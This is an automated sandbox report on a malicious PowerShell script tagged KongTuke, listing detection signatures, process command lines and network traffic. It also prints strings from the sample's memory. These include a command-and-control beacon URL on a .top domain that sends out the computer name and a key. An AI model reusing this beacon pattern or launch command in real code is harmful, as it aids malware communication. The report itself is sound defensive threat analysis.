Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579457
MD5:f710ad70e1fe42d5174f289867a61f93
SHA1:5d2c8485c88fef6f88db24094b6b39f1628825a7
SHA256:d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6884, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6884, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T13:42:07.577435+010028593911Domain Observed Used for C2 Detected192.168.2.4645771.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 13%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.4% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: powershell.exe, 00000000.00000002.1896922208.000001A1D8CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8C89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1892984995.000001A1D89A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb: source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbZ source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.1896530930.000001A1D8BCF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:64577 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C3002000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodle
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gif
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8C8B820_2_00007FFD9B8C8B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8C7DD60_2_00007FFD9B8C7DD6
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],lx3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WzSw4eoMOAGxg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2gXM0CeB8mUysjW2aKlJz2ym4q6jejH" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" 